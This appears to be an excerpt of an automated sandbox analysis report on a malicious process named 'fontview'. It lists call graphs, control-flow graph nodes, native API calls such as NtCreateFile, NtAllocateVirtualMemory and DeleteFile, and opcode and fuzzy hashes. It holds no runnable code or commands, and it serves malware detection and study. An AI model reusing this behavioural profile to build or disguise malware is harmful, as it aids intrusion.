97018 2a4f2c8 97016->97018 97018->97017 97020 2a4ed50 LdrLoadDll 97018->97020 97020->97018 97021 2a409d0 97022 2a409e9 97021->97022 97023 2a441c0 LdrLoadDll 97022->97023 97024 2a40a07 97023->97024 97025 2a50c00 LdrLoadDll 97024->97025 97026 2a40a1f 97025->97026 97027 2a40a53 97026->97027 97028 2a40a40 PostThreadMessageW 97026->97028 97028->97027 97029 2a46910 97030 2a4692c 97029->97030 97042 2a46a0f 97029->97042 97032 2a55240 2 API calls 97030->97032 97030->97042 97031 2a46aa2 97033 2a46947 97032->97033 97043 2a45f50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97033->97043 97035 2a46a7f 97035->97031 97045 2a46120 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97035->97045 97038 2a4697f 97039 2a444a0 LdrLoadDll 97038->97039 97040 2a469ac 97039->97040 97041 2a444a0 LdrLoadDll 97040->97041 97041->97042 97042->97031 97044 2a45f50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97042->97044 97043->97038 97044->97035 97045->97031 97046 2a58190 97047 2a57050 2 API calls 97046->97047 97048 2a581a5 97047->97048 97049 2a54fd0 97050 2a55047 97049->97050 97051 2a54ff1 97049->97051 97053 2a56230 LdrLoadDll 97050->97053 97052 2a56230 LdrLoadDll 97051->97052 97054 2a5500b 97052->97054 97055 2a5505d NtCreateFile 97053->97055 97056 2a4555c 97057 2a45504 97056->97057 97060 2a45560 97056->97060 97058 2a45516 97057->97058 97059 2a54960 2 API calls 97057->97059 97061 2a552d0 2 API calls 97058->97061 97059->97058 97062 2a4552b 97061->97062 97063 4ab2ad0 LdrInitializeThunk

                                                                                                                              Executed Functions

                                                                                                                              Function 02A399B0 Relevance: 28.0, Strings: 22, Instructions: 467COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 30 2a399b0-2a39dee 31 2a39df8-2a39dfc 30->31 32 2a39e17 31->32 33 2a39dfe-2a39e15 31->33 34 2a39e1e-2a39e25 32->34 33->31 35 2a39e57-2a39e61 34->35 36 2a39e27-2a39e55 34->36 37 2a39e72-2a39e7e 35->37 36->34 38 2a39e80-2a39e8d 37->38 39 2a39e8f-2a39ea7 37->39 38->37 40 2a39eb8-2a39ec1 39->40 42 2a39ec3-2a39ecf 40->42 43 2a39edf-2a39ee8 40->43 44 2a39ed1-2a39ed7 42->44 45 2a39edd 42->45 46 2a3a168-2a3a172 43->46 47 2a39eee-2a39ef8 43->47 44->45 45->40 48 2a3a183-2a3a18d 46->48 50 2a39f09-2a39f15 47->50 51 2a3a1c3-2a3a1cc 48->51 52 2a3a18f-2a3a19f 48->52 53 2a39f17-2a39f20 50->53 54 2a39f2d-2a39f37 50->54 58 2a3a1f1-2a3a1f8 51->58 59 2a3a1ce-2a3a1ef 51->59 56 2a3a1b2-2a3a1bb 52->56 57 2a3a1a1-2a3a1b0 52->57 60 2a39f22-2a39f28 53->60 61 2a39f2b 53->61 55 2a39f48-2a39f52 54->55 63 2a39f54-2a39f66 55->63 64 2a39f68-2a39f72 55->64 65 2a3a1c1 56->65 57->65 66 2a3a2ab-2a3a2b4 58->66 67 2a3a1fe-2a3a208 58->67 59->51 60->61 61->50 63->55 70 2a39f83-2a39f8c 64->70 65->48 72 2a3a2b6-2a3a2d7 66->72 73 2a3a2d9-2a3a2e0 66->73 68 2a3a219-2a3a225 67->68 74 2a3a227-2a3a230 68->74 75 2a3a23d call 2a56ce0 68->75 76 2a39f99-2a39fa3 70->76 77 2a39f8e-2a39f97 70->77 72->66 78 2a3a2e2-2a3a2f3 73->78 79 2a3a309-2a3a313 73->79 80 2a3a232-2a3a238 74->80 81 2a3a23b 74->81 91 2a3a242-2a3a249 75->91 85 2a39fb4-2a39fc0 76->85 77->70 86 2a3a2f5-2a3a2f9 78->86 87 2a3a2fa-2a3a2fc 78->87 82 2a3a324-2a3a330 79->82 80->81 90 2a3a20a-2a3a213 81->90 92 2a3a332-2a3a33e 82->92 93 2a3a34e-2a3a358 82->93 94 2a39fc2-2a39fd4 85->94 95 2a39fd6-2a39fe0 85->95 86->87 88 2a3a307 87->88 89 2a3a2fe-2a3a304 87->89 88->73 89->88 90->68 98 2a3a24b-2a3a278 91->98 99 2a3a27a-2a3a286 91->99 96 2a3a340-2a3a346 92->96 97 2a3a34c 92->97 100 2a3a369-2a3a375 93->100 94->85 102 2a39ff1-2a39ffd 95->102 96->97 97->82 98->91 99->66 106 2a3a288-2a3a2a9 99->106 107 2a3a393-2a3a3ad 100->107 108 2a3a377-2a3a383 100->108 103 2a39fff-2a3a00b 102->103 104 2a3a00d-2a3a010 102->104 103->102 110 2a3a016-2a3a01d 104->110 106->99 111 2a3a391 108->111 112 2a3a385-2a3a38b 108->112 113 2a3a044-2a3a04e 110->113 114 2a3a01f-2a3a042 110->114 111->100 112->111 116 2a3a05f-2a3a06b 113->116 114->110 117 2a3a07e-2a3a088 116->117 118 2a3a06d-2a3a07c 116->118 119 2a3a099-2a3a0a5 117->119 118->116 121 2a3a0a7-2a3a0b9 119->121 122 2a3a0bb-2a3a0ca 119->122 121->119 123 2a3a11b-2a3a122 122->123 124 2a3a0cc-2a3a0d6 122->124 126 2a3a124-2a3a157 123->126 127 2a3a159-2a3a163 123->127 128 2a3a0e7-2a3a0ee 124->128 126->123 127->43 129 2a3a0f0-2a3a117 128->129 130 2a3a119 128->130 129->128 130->46
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: %$%$1P$6@$?=$D$H$HV$I&$L$M$M$P$W$[1$_$e$i$iU$o$o%$P
                                                                                                                              • API String ID: 0-528503831
                                                                                                                              • Opcode ID: 4760c2df78d8db34c4257b5b400173bb445f35f6a5915b541e8bb60b579bc216
                                                                                                                              • Instruction ID: 5f8562891632a9ac9490a4e0ae1d5937288470a57502b6a57e4c38a657a6077e
                                                                                                                              • Opcode Fuzzy Hash: 4760c2df78d8db34c4257b5b400173bb445f35f6a5915b541e8bb60b579bc216
                                                                                                                              • Instruction Fuzzy Hash: A342A1B0D0522ACBEB25CF44C998BEEBBB1BB45308F1081D9D5596B281DBB55E89CF40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A4C300 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A4C3E4
                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 02A4C41F
                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 02A4C42A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3541575487-0
                                                                                                                              • Opcode ID: c2aecdd4c86bb0b527e38703e58ca2a0e437c83e7f047480f032a980cb14c1cd
                                                                                                                              • Instruction ID: 5098ed42ed6a3dd468d4fcec3b8d19cab261c6dbbf0dc24856e976c147b24452
                                                                                                                              • Opcode Fuzzy Hash: c2aecdd4c86bb0b527e38703e58ca2a0e437c83e7f047480f032a980cb14c1cd
                                                                                                                              • Instruction Fuzzy Hash: B331AFB5940208BBDB21DF64DD89FFFB77D9F84754F104459B908A7180EE70AA85CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A41AC0 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID: "x8#
                                                                                                                              • API String ID: 2340568224-3294973128
                                                                                                                              • Opcode ID: b54912117a70023ceeb8a3232e118cb22f1c399f596a31843e6eec0ad5832308
                                                                                                                              • Instruction ID: 1d3f10641746bc917d11d33893cc73dda3294baeec066d52b8252fb43c125bee
                                                                                                                              • Opcode Fuzzy Hash: b54912117a70023ceeb8a3232e118cb22f1c399f596a31843e6eec0ad5832308
                                                                                                                              • Instruction Fuzzy Hash: 1DE1A0B1D40218ABDB24DFA0DD81BFFB7B9AF84304F14455AE909A6141EF70A785CFA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A54FD0 Relevance: 1.6, APIs: 1, Instructions: 87filenativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02A5508E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 823142352-0
                                                                                                                              • Opcode ID: 8c8f54b6705e79f3e07e229fca26c084e98c70d9e8aebe4724d89cba79aba75e
                                                                                                                              • Instruction ID: 057b15d44532757883d1cfafa9a3af207159c34bca3dd6c69984b9fb9b1a2356
                                                                                                                              • Opcode Fuzzy Hash: 8c8f54b6705e79f3e07e229fca26c084e98c70d9e8aebe4724d89cba79aba75e
                                                                                                                              • Instruction Fuzzy Hash: D221A2B2210549BFDB44DF99DC81EEB73AEAF8C714F508208FA5D97240DA30E8518BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A55100 Relevance: 1.6, APIs: 1, Instructions: 79filenativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02A551AB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: b7abfef7784aa854fe949d1fdcbe2a4ebe1a6b5c624e9fc181da155e2a6ffa35
                                                                                                                              • Instruction ID: 284b26fb0fb3708ee82b0c707aa09a0396aa68b4567a2194bc5e08d734fe9905
                                                                                                                              • Opcode Fuzzy Hash: b7abfef7784aa854fe949d1fdcbe2a4ebe1a6b5c624e9fc181da155e2a6ffa35
                                                                                                                              • Instruction Fuzzy Hash: 2921C4B2240109BFDB04DF98DC80EEB77ADAF8D714F048208FA5DD7240DA30A9118BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A55370 Relevance: 1.6, APIs: 1, Instructions: 67memorynativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(02A41B38,?,02A42249,00000000,00000004,00003000,00000004,00000000,02A42249,?,02A41B38,02A42249,?), ref: 02A55406
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: f3371544b1aa87ca394e27890c48d4f5b995605479b83cf73aeac1f640bbe760
                                                                                                                              • Instruction ID: 3692610ee0992f9b4facd4329928998842d9a20887fb62f9517f37d40837a8bc
                                                                                                                              • Opcode Fuzzy Hash: f3371544b1aa87ca394e27890c48d4f5b995605479b83cf73aeac1f640bbe760
                                                                                                                              • Instruction Fuzzy Hash: 691116B6200209BFDB10DF98DC81EAB73ADEF89710F108109FE5897240DA70A8118BB2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A551C0 Relevance: 1.5, APIs: 1, Instructions: 47filenativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4033686569-0
                                                                                                                              • Opcode ID: 57c27c47a54bcd87636a0a2a60c471030505225754f600c1d6c9e390136ac219
                                                                                                                              • Instruction ID: 431172daf3b88d10a13cd2411b4aab3ee29edb62b7fbe2504334098b57b05a35
                                                                                                                              • Opcode Fuzzy Hash: 57c27c47a54bcd87636a0a2a60c471030505225754f600c1d6c9e390136ac219
                                                                                                                              • Instruction Fuzzy Hash: 0BF0D171641614BFD521E799DC40FABB3ADDFC5720F408409F95C97141DB3079418BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 02A55240 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A55277
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: a08fca5580a631a550be9335b754077320016150a14adcbc7aded5e184d4430a
                                                                                                                              • Instruction ID: fed54e2177792a2c427a7475194d010e352e20f532f1fedabed3208d1528d5be
                                                                                                                              • Opcode Fuzzy Hash: a08fca5580a631a550be9335b754077320016150a14adcbc7aded5e184d4430a
                                                                                                                              • Instruction Fuzzy Hash: D0E046722402147BD620EA99DC00FABB7ADEBC5B20F408015FA48A7242CA70BA018BF5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 03503cb0cf694b966124a52fd20dd1821e80c5f5c392a714c42c3770c24fc8fb
                                                                                                                              • Instruction ID: 32c57df7b7d6148d7c0d5ea540b1ef8c008f16731a6adb97dc7e8e73bc9b68de
                                                                                                                              • Opcode Fuzzy Hash: 03503cb0cf694b966124a52fd20dd1821e80c5f5c392a714c42c3770c24fc8fb
                                                                                                                              • Instruction Fuzzy Hash: 7D900261601500426180715948044066005ABE13063D6C11DA0555560C861DD9559269
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 48733b00d247362d0eaf720f862e3c234963a765e1f1fc85cbd34d8672d151c7
                                                                                                                              • Instruction ID: 4e7f58594b8e343c357276fe155b5f1c907f917bda0e24f5bd394a204e7eae7b
                                                                                                                              • Opcode Fuzzy Hash: 48733b00d247362d0eaf720f862e3c234963a765e1f1fc85cbd34d8672d151c7
                                                                                                                              • Instruction Fuzzy Hash: B990023160580012B180715948845464005ABE0306B96C019E0425554C8A19DA565361
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 93b9860cd5bca99e1fe062c61e5215b69c842662b1b03398d719d53b179a7deb
                                                                                                                              • Instruction ID: d46aa6fd54381c7cd36ff12c1f1133170ddc36fd198b5bd5b1112afcbbe2477b
                                                                                                                              • Opcode Fuzzy Hash: 93b9860cd5bca99e1fe062c61e5215b69c842662b1b03398d719d53b179a7deb
                                                                                                                              • Instruction Fuzzy Hash: FA90023120140402F1407599540864600059BE0306F96D019A5025555EC66AD9916131
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 109ecbf736221171dd35bf262b4410319162c72c09bb7fc374d5d89aa12920c2
                                                                                                                              • Instruction ID: 5e66d51a5b17b710e89c22330af4758a8d0597d494907d8f38336dd63b365746
                                                                                                                              • Opcode Fuzzy Hash: 109ecbf736221171dd35bf262b4410319162c72c09bb7fc374d5d89aa12920c2
                                                                                                                              • Instruction Fuzzy Hash: 5390023120140842F14071594404B4600059BE0306F96C01EA0125654D861AD9517521
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 9eadb3f142c6845388e8a3c5699bc9465a7f6d93a77081e6cf780b6d0664846a
                                                                                                                              • Instruction ID: 0558e6d8ee77a354613dd2373f4f09557ab749c9613acbaa04b00d2076ede5c6
                                                                                                                              • Opcode Fuzzy Hash: 9eadb3f142c6845388e8a3c5699bc9465a7f6d93a77081e6cf780b6d0664846a
                                                                                                                              • Instruction Fuzzy Hash: 2690023120148802F1507159840474A00059BD0306F9AC419A4425658D869AD9917121
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 4d8885478d695ab81bb4f49cf5173b143a2791e3feaf9d1e74f0c2084e1f7fe7
                                                                                                                              • Instruction ID: da5fb2ab5cf0737c35b33faac5bc5d8dfec6fe37fa9b9d072e222bb8544c6f92
                                                                                                                              • Opcode Fuzzy Hash: 4d8885478d695ab81bb4f49cf5173b143a2791e3feaf9d1e74f0c2084e1f7fe7
                                                                                                                              • Instruction Fuzzy Hash: 3590023120140413F1517159450470700099BD0246FD6C41AA0425558D965BDA52A121
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6e139fa74f73ae272d9098b48c0bebf4aadd5d588bb7fafb6a32820f9bc1fa75
                                                                                                                              • Instruction ID: 14fac668c5500340183bb159b7ff98a20293f253c1d8e541fd584966716eba01
                                                                                                                              • Opcode Fuzzy Hash: 6e139fa74f73ae272d9098b48c0bebf4aadd5d588bb7fafb6a32820f9bc1fa75
                                                                                                                              • Instruction Fuzzy Hash: 9C900221242441527585B15944045074006ABE02467D6C01AA1415950C852BE956D621
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: fb8c52745ffb2383c62b79b373530b4dd1bf57840cc1bf9f75a9b310ebc80503
                                                                                                                              • Instruction ID: 1b65b91fafb24352c2690ef2246ad7aba486732d433ca6f3098d5082f6b9c9e4
                                                                                                                              • Opcode Fuzzy Hash: fb8c52745ffb2383c62b79b373530b4dd1bf57840cc1bf9f75a9b310ebc80503
                                                                                                                              • Instruction Fuzzy Hash: E090022130140003F180715954186064005EBE1306F96D019E0415554CD91AD9565222
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 04AB2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b4838e7f239a5fabf0b02566bbb26323a5a68cbd88dbc7f0b659c0d4a0a2288c
                                                                                                                              • Instruction ID: 0ab0dc77a6fcc71e76d3cc81457302710f829ca90206605bc3a4b1c4dd3598b4
                                                                                                                              • Opcode Fuzzy Hash: b4838e7f239a5fabf0b02566bbb26323a5a68cbd88dbc7f0b659c0d4a0a2288c
